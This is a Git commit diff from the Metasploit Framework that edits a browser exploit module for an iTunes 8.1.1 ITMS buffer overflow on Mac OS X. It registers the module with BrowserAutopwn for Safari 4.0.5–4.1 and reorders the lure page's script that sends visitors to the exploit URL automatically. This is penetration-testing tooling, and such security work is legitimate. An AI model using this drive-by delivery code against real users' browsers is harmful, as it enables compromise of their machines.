Merge branch 'add_bap_to_itms_overflow' of github.com:jvennix-r7/metasploit-framework into jvennix-r7-add_bap_to_itms_overflow

sinn3r · sinn3r · commit b5167e7695d3 · 2013-01-15T12:25:07.000-06:00
diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb
@@ -13,6 +13,17 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::HttpServer::HTML
 
+	# no popup required to visit itms:// URLs in Safari, so throw it in BAP
+	include Msf::Exploit::Remote::BrowserAutopwn
+	autopwn_info({
+		:ua_name    => HttpClients::SAFARI,
+		:ua_maxver  => "4.1",
+		:ua_minver  => "4.0.5",
+		:javascript => false,
+		:rank       => NormalRanking,
+		:os_name => OperatingSystems::MAC_OSX
+	})
+
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'           => 'Apple OS X iTunes 8.1.1 ITMS Overflow',
@@ -93,9 +104,9 @@ def generate_itms_page(p)
 		return String(<<-EOS)
 <html><head><title>iTunes loading . . .</title></head>
 <body>
-<script>document.location.assign("#{itms_base_url}");</script>
 <p>iTunes should open automatically, but if it doesn't, click to
-<a href="#{itms_base_url}">continue</a>.</p>a
+<a href="#{itms_base_url}">continue</a>.</p>
+<script>document.location.assign("#{itms_base_url}");</script>
 </body>
 </html>
 EOS
